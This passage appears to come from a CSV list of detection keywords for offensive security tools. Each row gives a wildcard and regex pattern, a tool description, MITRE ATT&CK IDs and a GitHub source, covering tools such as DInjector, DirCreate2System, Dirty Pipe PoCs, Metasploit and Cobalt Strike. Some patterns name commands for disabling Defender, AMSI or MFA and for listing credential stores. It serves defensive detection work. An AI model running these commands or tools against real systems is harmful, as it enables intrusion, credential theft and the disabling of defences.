repo","10","N/A","N/A","N/A","N/A","N/A" "*DInjector.csproj*",".{0,1000}DInjector\.csproj.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector.Detonator*",".{0,1000}DInjector\.Detonator.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector.dll*",".{0,1000}DInjector\.dll.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*DInjector/Dinjector*",".{0,1000}DInjector\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Dinjector-main*",".{0,1000}Dinjector\-main.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Dionach*PassHunt*",".{0,1000}Dionach.{0,1000}PassHunt.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*dir C:\Users\*\AppData\Local\Microsoft\Credentials*",".{0,1000}dir\sC\:\\Users\\.{0,1000}\\AppData\\Local\\Microsoft\\Credentials.{0,1000}","offensive_tool_keyword","dir","Find the IDs of protected secrets for a specific user","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dir_create2system.txt*",".{0,1000}dir_create2system\.txt.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*",".{0,1000}dirb\s.{0,1000}http.{0,1000}\s\/usr\/share\/seclists\/Discovery\/Web\-Content\/big\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirb/wordlists*",".{0,1000}dirb\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dircreate2system.cpp*",".{0,1000}dircreate2system\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dircreate2system.exe*",".{0,1000}dircreate2system\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dircreate2system.vcxproj*",".{0,1000}dircreate2system\.vcxproj.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DirCreate2System-main*",".{0,1000}DirCreate2System\-main.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*Direct_Syscalls_Create_Thread.c*",".{0,1000}Direct_Syscalls_Create_Thread\.c.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.exe*",".{0,1000}Direct_Syscalls_Create_Thread\.exe.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.sln*",".{0,1000}Direct_Syscalls_Create_Thread\.sln.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.vcxproj*",".{0,1000}Direct_Syscalls_Create_Thread\.vcxproj.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Directory-Traversal-Payloads.*",".{0,1000}Directory\-Traversal\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Direct-Syscalls-vs-Indirect-Syscalls.git*",".{0,1000}Direct\-Syscalls\-vs\-Indirect\-Syscalls\.git.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*dirkjan@sanoweb.nl*",".{0,1000}dirkjan\@sanoweb\.nl.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*dirkjanm/adidnsdump*",".{0,1000}dirkjanm\/adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*dirkjanm/ldapdomaindump*",".{0,1000}dirkjanm\/ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*dirkjanm/PrivExchange*",".{0,1000}dirkjanm\/PrivExchange.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*dirscanner.py*",".{0,1000}dirscanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*dirscraper*",".{0,1000}dirscraper.{0,1000}","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","217","35","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z" "*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*",".{0,1000}dirsearch\s\-r\s\-w\s\/usr\/share\/wordlists\/seclists\/Discovery\/Web\-Content\/quickhits\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirsearch*",".{0,1000}dirsearch.{0,1000}","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","11267","2254","2024-04-30T13:55:27Z","2013-04-30T15:57:40Z" "*dirTraversal.txt*",".{0,1000}dirTraversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*dirTraversal-nix.txt*",".{0,1000}dirTraversal\-nix\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*dirTraversal-win.txt*",".{0,1000}dirTraversal\-win\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*dirty_sock*",".{0,1000}dirty_sock.{0,1000}","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","658","154","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z" "*dirty_sock/archive/master.zip*",".{0,1000}dirty_sock\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*dirtycow*",".{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dirty-Pipe/exploit-static*",".{0,1000}Dirty\-Pipe\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*dirtypipe-exploit/blob/main/dirtypipe.c*",".{0,1000}dirtypipe\-exploit\/blob\/main\/dirtypipe\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-DirtyPipe-Exploits*",".{0,1000}\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","6","508","137","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z" "*dirwalk.py*",".{0,1000}dirwalk\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*'Disable all http access logs'*",".{0,1000}\'Disable\sall\shttp\saccess\slogs\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*disable_clamav.*",".{0,1000}disable_clamav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*disable_clamav.rb*",".{0,1000}disable_clamav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Disable_Privilege /Process:* /Privilege:*",".{0,1000}Disable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*DisableAllWindowsSoftwareFirewalls*",".{0,1000}DisableAllWindowsSoftwareFirewalls.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*Disable-AMS1.ps1*",".{0,1000}Disable\-AMS1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DisableAMSI(*",".{0,1000}DisableAMSI\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DisableAntiPhishing*",".{0,1000}DisableAntiPhishing.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableAntiPhishing.ps1*",".{0,1000}DisableAntiPhishing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableCylance.ps1*",".{0,1000}DisableCylance\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*DisableDefender.ps1*",".{0,1000}DisableDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*disableeventvwr/*.ps1*",".{0,1000}disableeventvwr\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*DisableKerberosSigning*",".{0,1000}DisableKerberosSigning.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*DisableMailboxAuditing.ps1*",".{0,1000}DisableMailboxAuditing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableMFA.ps1*",".{0,1000}DisableMFA\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableRealtimeMonitoring $true*",".{0,1000}DisableRealtimeMonitoring\s\$true.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*disableWinDef.cpp*",".{0,1000}disableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense 